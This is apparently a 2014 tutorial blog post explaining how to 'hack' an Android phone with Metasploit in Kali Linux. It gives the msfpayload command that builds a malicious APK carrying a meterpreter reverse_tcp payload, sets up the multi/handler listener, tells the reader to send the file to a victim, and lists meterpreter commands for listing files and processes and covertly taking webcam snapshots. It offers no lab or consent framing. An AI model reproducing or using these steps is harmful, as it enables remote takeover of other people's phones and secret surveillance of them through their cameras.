Hack Android Phone with Metasploit in Kali Linux

Open Kali Linux Terminal and type
msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.6 lport= 443 R > /root/Desktop/files.apk
-p for payloadandroid/meterpreter/reverse_tcp
Lhost (IP address of your local host)192.168.1.6
Lport (Port of your local pc)443
-R formatOutput format
Now we successfully generate the malicious apk File, it will stored on your local computer
/root/Desktop/files.apk
Now open your kali linux terminal and type msfconsole
Screenshot from 2014-01-13 19:52:04
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.6
set lport 443
exploit
Now send your files.apk files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim Android Phone.
Screenshot from 2014-01-24 18:15:51
LS
As in Linux, the ‘ls’ command will list the files in the current remote directory.
Screenshot from 2014-01-24 18:17:08
PS
The ‘ps’ command displays a list of running processes on the target.
Screenshot from 2014-01-24 18:18:18
Webcam_list
This command provides you a list of all webcams on the target system. Each webcam will have an index number.
Webcam_snap 1
This command take a snapshot for the specified webcam, by default number 1 and will try without argument precision to open the saved snapshot
Screenshot from 2014-01-24 18:20:46Screenshot from 2014-01-24 18:21:40Screenshot from 2014-01-24 18:22:21
index